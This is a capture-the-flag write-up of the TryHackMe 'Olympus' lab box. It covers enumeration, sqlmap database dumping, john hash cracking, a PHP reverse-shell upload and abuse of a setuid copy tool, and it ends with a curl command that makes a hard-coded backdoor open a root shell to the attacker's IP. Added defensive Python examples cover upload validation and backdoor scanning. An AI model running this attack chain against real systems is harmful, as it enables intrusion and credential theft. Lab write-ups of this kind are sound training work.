CTF : Olympus

CTF Olympus writeup. Source: THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 18 July 2022

Information

  • IP: 10.10.190.244
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP

```console
$ sudo nmap -p22,80 -A 10.10.190.244
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 17:30 CEST
Nmap scan report for 10.10.190.244
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://olympus.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   36.23 ms 10.9.0.1
2   36.22 ms 10.10.190.244

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.96 seconds
```

As we can see, there is a redirect to olympus.thm, so I added that entry to my /etc/hosts.

```console
$ sudo nmap -p22,80 -A olympus.thm
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 17:32 CEST
Nmap scan report for olympus.thm (10.10.190.244)
Host is up (0.043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Olympus
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   36.36 ms 10.9.0.1
2   36.36 ms olympus.thm (10.10.190.244)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.72 seconds
```

Vulnerabilities search

There is a message on the main page:

```html
[...]
<meta name="Keywords" content="AperiSolve, Aprisolve, Aperi'Solve, Apri'Solve, Zeecka">
[...]
<div>The website is still under developpment.</div>
<div id="notimage" class="hidden">If support is needed, please contact root@the-it-department. The old version of the website is still accessible on this domain.</div>
[...]
```

It seems that a subdomain might exist. Let's search for it:

```console
$ gobuster vhost -u http://olympus.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://olympus.thm
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/07/19 16:34:22 Starting gobuster in VHOST enumeration mode
===============================================================
Found: chat.olympus.thm (Status: 200) [Size: 1577]
===============================================================
2022/07/19 16:35:02 Finished
===============================================================
```

I added chat.olympus.thm to my /etc/hosts file.

I landed on a login page, but with no clue on how to get creds...

So, enumeration...

```console
$ dirsearch -u http://olympus.thm -w /usr/share/seclists/Discovery/Web-Content/common.txt -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 31947

Output File: /home/boula/.dirsearch/reports/olympus.thm/_22-07-19_17-16-08.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-07-19_17-16-08.log

Target: http://olympus.thm/

[17:16:08] Starting:
[17:16:50] 403 -  276B  - /icons/
[17:16:51] 200 -    2KB - /index.php
[17:16:54] 301 -  315B  - /javascript  ->  http://olympus.thm/javascript/
[17:16:54] 403 -  276B  - /javascript/
[17:17:15] 403 -  276B  - /phpmyadmin/
[17:17:15] 403 -  276B  - /phpmyadmin
[17:17:32] 403 -  276B  - /server-status
[17:17:32] 403 -  276B  - /server-status/
[17:17:39] 200 -    2KB - /static/
[17:17:39] 301 -  311B  - /static  ->  http://olympus.thm/static/
[17:18:03] 301 -  315B  - /~webmaster  ->  http://olympus.thm/~webmaster/
[17:18:03] 200 -    9KB - /~webmaster/
```

http://olympus.thm/~webmaster/index.php leads to an instance of Victor CMS.

```console
$ searchsploit victor
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting                          | php/webapps/48511.txt
Victor CMS 1.0 - 'cat_id' SQL Injection                                              | php/webapps/48485.txt
Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting                    | php/webapps/48484.txt
Victor CMS 1.0 - 'post' SQL Injection                                                | php/webapps/48451.txt
Victor CMS 1.0 - 'Search' SQL Injection                                              | php/webapps/48734.txt
Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting                    | php/webapps/48626.txt
Victor CMS 1.0 - Authenticated Arbitrary File Upload                                 | php/webapps/48490.txt
Victor CMS 1.0 - File Upload To RCE                                                  | php/webapps/49310.txt
Victor CMS 1.0 - Multiple SQL Injection (Authenticated)                              | php/webapps/49282.txt
Victory FTP Server 5.0 - Denial of Service                                           | windows/dos/16230.py
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

Maybe there is a way to use an SQLi...

Exploit

I saved the POST request of a search query with Burp and fed it to sqlmap to get access to the MySQL database and dump it.

```shell
sqlmap -r chat_upload_post.txt --level=5 --risk=3 --dump-all
```

Then I found hashes in the user table:

prometheus:$2y$10$--------------
root:$2y$10$-------------
zeus:$2y$10$------------

I used john to crack them:

```shell
john ./hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

And I found prometheus' password.

I was stuck for a long time on Victor CMS, because no other exploit worked.

I tried chat.olympus.thm with the prometheus creds. It worked!

There was a discussion explaining that uploaded files were renamed randomly.

But in the previously dumped database there was a table called chats that kept the mapping between the original file name and the new one.

So I uploaded a PHP reverse shell file and used sqlmap again to find the new filename:

```shell
sqlmap -r victor_search_post.txt --level=5 --risk=3 --sql-shell -D olympus
```

```sql
select * from chats;
```
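The chat upload above shows why a random file name is not a control on its own: the original-to-random mapping sat in the same database the SQLi reached, and the uploads directory executed PHP. As an added example (not the chat application's own code; all names are hypothetical), here is the upload handling a defender would want instead: type and extension validation, storage outside the document root, and a non-executable mode.

```python
import os
import secrets
from pathlib import Path

# Added example, not code from the writeup or the Olympus chat app.
# Anything Apache/mod_php might execute is refused wherever it appears in
# the name, so "shell.php.png" style double extensions are rejected too.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "htaccess"}
ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
# Leading bytes the declared type must start with (none for plain text).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8", "pdf": b"%PDF-"}

class UploadRejected(ValueError):
    pass

def check_upload(original_name: str, data: bytes) -> str:
    """Validate name and content; return the extension to store under."""
    parts = Path(original_name).name.lower().split(".")
    if len(parts) < 2 or "" in parts:          # no extension, or ".htaccess"
        raise UploadRejected("missing or empty extension")
    exts = parts[1:]
    if EXECUTABLE_EXTS & set(exts):
        raise UploadRejected("executable extension in name")
    ext = exts[-1]
    if ext not in ALLOWED_EXTS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared type")
    return ext

def is_accepted(original_name: str, data: bytes) -> bool:
    try:
        check_upload(original_name, data)
        return True
    except UploadRejected:
        return False

def store_upload(original_name: str, data: bytes, upload_root) -> str:
    """Write under a random name inside upload_root (a directory outside the
    web root) and return that name; serve it through a download endpoint."""
    ext = check_upload(original_name, data)
    stored = f"{secrets.token_hex(16)}.{ext}"
    target = Path(upload_root) / stored
    with open(target, "xb") as fh:       # "x": never overwrite an existing name
        fh.write(data)
    os.chmod(target, 0o640)              # readable by the app, never executable
    return stored
```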

Then I started pwncat on port 1234 and triggered the reverse shell:

```shell
curl 'http://chat.olympus.thm/uploads/63d20db27be50d4b469758e21901918b.php'
```

I finally got a shell.

Privilege escalation

Enumeration for privesc

```console
$ find / -user zeus -readable 2>/dev/null
/home/zeus
/home/zeus/zeus.txt
/home/zeus/user.flag
/home/zeus/.sudo_as_admin_successful
/home/zeus/.bash_logout
/home/zeus/.local
/home/zeus/.bashrc
/home/zeus/.profile
/usr/bin/cputils
/var/www/olympus.thm/public_html/~webmaster/search.php
```

```console
$ ls -al /usr/bin/cputils
-rwsr-xr-x 1 zeus zeus 17728 Apr 18 09:27 /usr/bin/cputils
```

OK, this setuid binary should be useful to escalate to the zeus account...

I created a file /tmp/authorized_keys with my SSH public key.

Then I used /usr/bin/cputils to copy it as zeus into /home/zeus/.ssh/.

Now I can use SSH to connect to the box as zeus.

I found a suspicious directory: /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc

As zeus I could read VIGQFQFMYOST.php, which seems to be a PHP reverse shell. It's password protected, but the password is hard-coded in the PHP file.
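A backdoor like this one (a randomly named PHP file under a randomly named web directory, gated by a hard-coded password and reaching out with a socket) is what a defender should be scanning the web root for. The following is an added example, not code from the writeup: a small heuristic scorer over PHP sources, with constructed samples so it runs offline; the indicator names and threshold are my own choices.

```python
import re
from pathlib import Path

# Added example, not code from the writeup. Heuristics for PHP files that look
# like the password-protected backdoor found above: request input reaching a
# network/exec/eval primitive, plus a hard-coded secret. Samples are constructed.
INDICATORS = {
    "exec": re.compile(r"\b(?:exec|shell_exec|system|passthru|proc_open|popen)\s*\(", re.I),
    "socket": re.compile(r"\b(?:fsockopen|socket_create|stream_socket_client)\s*\(", re.I),
    "eval": re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I),
    "decode": re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "secret": re.compile(r"\$(?:pass|password|pwd|secret|key)\w*\s*=\s*['\"][^'\"]+['\"]", re.I),
    "input": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[", re.I),
}

def score_php(source: str) -> tuple:
    """Return (score, sorted indicator names) for one PHP source text."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(source)}
    score = len(hits)
    # user input next to a shell/socket/eval primitive is the core pattern
    if "input" in hits and hits & {"exec", "socket", "eval"}:
        score += 3
    return score, sorted(hits)

def scan_webroot(root, threshold: int = 5) -> list:
    """Walk a web root and return [(path, score, hits)] at or above threshold."""
    out = []
    for path in Path(root).rglob("*.php"):
        try:
            score, hits = score_php(path.read_text(errors="replace"))
        except OSError:
            continue
        if score >= threshold:
            out.append((str(path), score, hits))
    return sorted(out, key=lambda t: -t[1])

# Constructed samples: a backdoor-like skeleton and a normal search page.
BACKDOOR_LIKE = """<?php
$password = "hardcoded-example";            // constructed, not the real file
if ($_GET['pass'] !== $password) { die('nope'); }
$sock = fsockopen($_GET['ip'], (int)$_GET['port']);
"""
BENIGN = """<?php
$q = htmlspecialchars($_GET['q'] ?? '');
echo "<p>Results for $q</p>";
"""

if __name__ == "__main__":
    for label, src in (("backdoor-like", BACKDOOR_LIKE), ("benign", BENIGN)):
        print(label, score_php(src))
```

Run `scan_webroot("/var/www")` on a host to list candidates; a score of 5 or more means input plus a dangerous primitive, which is worth a manual look even when the file name and directory look random.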

Exploit

And here it is; I just need to use pwncat again:

```shell
pwncat -lp 1235
```

And call the PHP script with the right params:

```shell
curl 'http://10.10.190.244/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.9.85.5&port=1235'
```

I got a root shell :)

\o/

Bonus

There was a hidden flag:

```shell
grep -r "flag{" /
```

This is brutal... but it works ;)